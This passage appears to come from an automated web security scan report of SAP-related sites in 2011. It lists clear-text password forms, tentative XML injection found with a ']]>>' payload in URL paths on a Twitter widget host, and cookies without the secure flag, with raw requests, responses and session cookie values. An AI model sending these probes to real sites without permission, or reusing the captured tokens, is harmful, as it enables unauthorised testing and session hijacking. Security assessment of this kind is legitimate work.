s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318691703148%3B%20pe%3Dno%2520value%7C1318691703151%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318691703155%3B%20s_nr%3D1318689903165-New%7C1321281903165%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293503170%3B%20s_visit%3D1%7C1318691703171%3B%20gpv_p47%3Dno%2520value%7C1318691703175%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Ablog%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.sdn.sap.com/irj/scn/sdnweblogs/popularposts%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Content-Length: 28644
Date: Sat, 15 Oct 2011 14:58:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...
6.10. http://www.sdn.sap.com/irj/scn/weblogs  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/weblogs

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /irj/scn/weblogs?blog=/weblogs/topic/27 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fforum.jspa%3fforumID%3d209%26start%3d0; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; s_pers=%20c13%3Dscn%253Aglo%253Aforums%7C1318690486859%3B%20pe%3Dno%2520value%7C1318690486862%3B%20c3%3Dno%2520value%7C1318690486864%3B%20s_nr%3D1318688686869-New%7C1321280686869%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292286872%3B%20s_visit%3D1%7C1318690486873%3B%20gpv_p47%3Dno%2520value%7C1318690486876%3B%20s_ttc%3D1318688493%7C1350224686878%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==
Expires: 0
Content-Length: 28880
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:24:59 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...
6.11. http://www.sdn.sap.com/irj/sdn/logon  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/sdn/logon

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /irj/sdn/logon HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:04:54 GMT
Content-Length: 21956
Connection: close
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...
6.12. http://www.sdn.sap.com/irj/sdn/mypoints  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/sdn/mypoints

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /irj/sdn/mypoints HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:05:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/
Content-Length: 44998

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...
7. XML injection  previous  next
There are 3 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.

7.1. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/t.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/images/t.gif?_=1318688595613&count=none&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fwww.sapphirenow.com%2Fmadrid%2F&text=%23SAPPHIRENOW&url=http%3A%2F%2Fwww.sapphirenow.com%2Fmadrid%2F&via=sapphirenow&twttr_referrer=http%3A%2F%2Fwww.sapphirenow.com%2Fmadrid%2F&twttr_li=0&twttr_widget=1&twttr_guest_id=v1%3A131479755238577138 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://platform.twitter.com/widgets/tweet_button.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __qca=P0-1403506059-1316475190092; __utma=43838368.1721518288.1314976448.1317669673.1317824994.9; __utmz=43838368.1317824994.9.8.utmcsr=swampland.time.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/08/25/health-care-problem-creeping-up-on-romney-again/; k=10.35.1.123.1318434060898796

Response

HTTP/1.1 403 Forbidden
Content-Type: application/xml
Date: Sat, 15 Oct 2011 14:23:01 GMT
Connection: close
Connection: Transfer-Encoding
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>CD3BEF8875A7FBAF</RequestId><HostId>qEf2Fm9uzfxq0yMoB0JOd3exHjnUQvBh2t7vXFSc6DzhxLQ5+Q
...[SNIP]...
7.2. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/t.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/images]]>>/t.gif?_=1318688595613&count=none&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fwww.sapphirenow.com%2Fmadrid%2F&text=%23SAPPHIRENOW&url=http%3A%2F%2Fwww.sapphirenow.com%2Fmadrid%2F&via=sapphirenow&twttr_referrer=http%3A%2F%2Fwww.sapphirenow.com%2Fmadrid%2F&twttr_li=0&twttr_widget=1&twttr_guest_id=v1%3A131479755238577138 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://platform.twitter.com/widgets/tweet_button.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __qca=P0-1403506059-1316475190092; __utma=43838368.1721518288.1314976448.1317669673.1317824994.9; __utmz=43838368.1317824994.9.8.utmcsr=swampland.time.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/08/25/health-care-problem-creeping-up-on-romney-again/; k=10.35.1.123.1318434060898796

Response

HTTP/1.1 403 Forbidden
Content-Type: application/xml
Date: Sat, 15 Oct 2011 14:23:01 GMT
Connection: close
Connection: Transfer-Encoding
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>659DADBABD2EF17C</RequestId><HostId>WssntmQmtd5riloZQlQOafp/ytwEYbOg8TbElEMmhlZPO76bvN
...[SNIP]...
7.3. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/t.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/images/t.gif]]>>?_=1318688595613&count=none&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fwww.sapphirenow.com%2Fmadrid%2F&text=%23SAPPHIRENOW&url=http%3A%2F%2Fwww.sapphirenow.com%2Fmadrid%2F&via=sapphirenow&twttr_referrer=http%3A%2F%2Fwww.sapphirenow.com%2Fmadrid%2F&twttr_li=0&twttr_widget=1&twttr_guest_id=v1%3A131479755238577138 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://platform.twitter.com/widgets/tweet_button.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __qca=P0-1403506059-1316475190092; __utma=43838368.1721518288.1314976448.1317669673.1317824994.9; __utmz=43838368.1317824994.9.8.utmcsr=swampland.time.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/08/25/health-care-problem-creeping-up-on-romney-again/; k=10.35.1.123.1318434060898796

Response

HTTP/1.1 403 Forbidden
Content-Type: application/xml
Date: Sat, 15 Oct 2011 14:23:01 GMT
Connection: close
Connection: Transfer-Encoding
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>484825C65BB451D4</RequestId><HostId>4lhCNp4PSZLYDp7lRN1HPUZwkhZhMCGeVodcoPEv5nX3ApZmBj
...[SNIP]...
8. SSL cookie without secure flag set  previous  next
There are 22 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

8.1. https://s.analytics.yahoo.com/fpc.pl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://s.analytics.yahoo.com
Path:   /fpc.pl

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fpc.pl?a=10002109824374&v=4.47&enc=utf-8&f=https%3A//www.sap.com/sme/contactsap/index.epx&b=Contact%20SAP&c=sme&x=07&cf3=Contact_General&cf4=Contact_General&cf17=Global&e=http%3A//burp/show/12&flv=WIN%2010%2C3%2C183%2C10&d=Sat%2C%2015%20Oct%202011%2015%3A15%3A41%20UTC&n=5&g=en-us&h=Y&j=1920x1200&k=16&l=true&ittidx=0&fpc=M7bgHDDi%7CKd30fNBLaa%7Cfses10002109824374%3D%7CKd30fNBLaa%7CM7bgHDDi%7Cfvis10002109824374%3DZj1odHRwcyUzQS8vd3d3LnNhcC5jb20vc21lL2NvbnRhY3RzYXAvaW5kZXguZXB4JmI9Q29udGFjdCUyMFNBUA%3D%3D%7C8M8o0780sT%7C8M8o0780sT%7C8M8o0780sT%7C8%7C8M8o0780sT%7C8M8o0780sT HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: s.analytics.yahoo.com
Connection: Keep-Alive
Cookie: B=bbb07qp77cca3&b=3&s=p1; itvisitorid10002109824374=Kd30fNBLaa|M7bgHDDi|fvis10002109824374=Zj1odHRwcyUzQS8vd3d3LnNhcC5jb20vc21lL2NvbnRhY3RzYXAvaW5kZXguZXB4JmI9Q29udGFjdCUyMFNBUA==|T|T|T|M|8M8o0780Hs|T; itsessionid10002109824374=Kd30fNBLaa|fses10002109824374=

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:15:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: itvisitorid10002109824374=Kd30fNBLaa|M7bgHDDi|fvis10002109824374=Zj1odHRwcyUzQS8vd3d3LnNhcC5jb20vc21lL2NvbnRhY3RzYXAvaW5kZXguZXB4JmI9Q29udGFjdCUyMFNBUA==|T|T|T|T|8M8o078HsM|T; path=/; domain=.analytics.yahoo.com
Set-Cookie: itsessionid10002109824374=Kd30fNBLaa|fses10002109824374=; path=/; domain=.analytics.yahoo.com
TS: 0 205 dc4_ird
Pragma: no-cache
Expires: Sat, 15 Oct 2011 15:15:24 GMT
Cache-Control: no-cache, private, must-revalidate
Content-Length: 45
Accept-Ranges: bytes
Tracking-Status: fpc site tracked
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript

// First Party Cookies
// TS: 0 205 dc4_ird

8.2. https://sales.liveperson.net/visitor/addons/deploy2.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://sales.liveperson.net
Path:   /visitor/addons/deploy2.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy2.asp?site=37021986&d_id=1&default=simpleDeploy HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Referer: https://www.sap.com/sme/contactsap/index.epx
Host: sales.liveperson.net
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:27:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 11 Oct 2011 14:31:36 GMT
Content-Length: 46014
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDASQTAASD=EFCBMEDCJGOGKJJDOJPEIKJJ; path=/
Cache-control: public, max-age=3600, s-maxage=3600

lpAddMonitorTag();
if(typeof lpMTagConfig!="undefined")lpMTagConfig.getLPVarValue=function(c){if(!lpMTagConfig.varLookup){lpMTagConfig.varLookup={};for(var b=0;b<lpMTagConfig.vars.length;b++){var a=l
...[SNIP]...
8.3. https://sales.liveperson.net/visitor/addons/deploy2.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://sales.liveperson.net
Path:   /visitor/addons/deploy2.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy2.asp?site=37021986&d_id=1&default=simpleDeploy HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: sales.liveperson.net
If-Modified-Since: Tue, 11 Oct 2011 14:31:36 GMT
Connection: Keep-Alive
Cookie: ASPSESSIONIDAQTARCRC=MIIACKDCJHLJIMCHEDDAEOPL; LivePersonID=LP i=5140389589811,d=1318691628

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:27:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 11 Oct 2011 14:31:36 GMT
Content-Length: 46014
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSQQSRQRS=KCFLHIDCADKIDENMHBAIHMGO; path=/
Cache-control: public, max-age=3600, s-maxage=3600

lpAddMonitorTag();
if(typeof lpMTagConfig!="undefined")lpMTagConfig.getLPVarValue=function(c){if(!lpMTagConfig.varLookup){lpMTagConfig.varLookup={};for(var b=0;b<lpMTagConfig.vars.length;b++){var a=l
...[SNIP]...
8.4. https://sapphire-nowmadrid.sapevents.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://sapphire-nowmadrid.sapevents.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: sapphire-nowmadrid.sapevents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=961013;expires=Mon, 07-Oct-2041 14:35:04 GMT;path=/
Set-Cookie: CFTOKEN=cb2412da3e988c3-0801EEF5-0494-7B81-1E70242D17ED02CD;expires=Mon, 07-Oct-2041 14:35:04 GMT;path=/
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:35:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/jav
...[SNIP]...
8.5. https://wiki.sdn.sap.com/wiki/display/HOME  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://wiki.sdn.sap.com
Path:   /wiki/display/HOME

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wiki/display/HOME HTTP/1.1
Host: wiki.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: SAP NetWeaver Application Server 7.20 / AS Java 7.20
sdn_uid: Guest
sdn_guid: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
sdn_visit: QUMxMDU0MDgtMTMzMDgxNzBFNTktQUNBQzA5QTU4MkExRkM0NA==
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-confluence-request-time: 1318690688602
x-confluence-cluster-node: Member(Id=1, Timestamp=2011-10-09 03:06:04.333, Address=172.16.84.8:8088, MachineId=59400, Location=process:23847@spwdfvml0204)
Location: https://wiki.sdn.sap.com:443/wiki/display/HOME/FAQ
Content-Length: 1751
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:58:08 GMT
Connection: close
Set-Cookie: saplb_*=(J2EE8243320)8243350; Version=1; Path=/
Set-Cookie: JSESSIONID=8zWp1LE9zVQKhsRFGYO-DyFbDhcIMwGWyH0A_SAPgKRDRzD6Pucfy_Alqw7AWMYs; Version=1; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>302 Found</title>
<style>
td {font-family : Arial, Tahoma, Helvetica, sans-serif; font-size : 14px;}

...[SNIP]...
8.6. https://sales.liveperson.net/hc/37021986/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sales.liveperson.net
Path:   /hc/37021986/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/37021986/?&site=37021986&cmd=mTagKnockPage&lpCallId=953043236838-236721785208&protV=20&lpjson=1&id=2404879032&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-sap-sme-us-en-1%7ClpMTagConfig.db1%7ClpChatButtonDiv1%7C%23voice-sales-sap-sme-us-en-1%7ClpMTagConfig.db1%7ClpVoiceButtonDiv1%7C HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: sales.liveperson.net
Connection: Keep-Alive
Cookie: ASPSESSIONIDAQTARCRC=MIIACKDCJHLJIMCHEDDAEOPL

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:27:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=6638045003516868152; path=/hc/37021986
Set-Cookie: HumanClickKEY=6638045003516868152; path=/hc/37021986
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 15 Oct 2011 15:27:11 GMT
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Content-Length: 33211

lpConnLib.Process({"ResultSet": {"lpCallId":"953043236838-236721785208","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
8.7. https://store.sap.com/sap/ap/ui/repository/store/StartPage.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.sap.com
Path:   /sap/ap/ui/repository/store/StartPage.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sap/ap/ui/repository/store/StartPage.html HTTP/1.1
Host: store.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
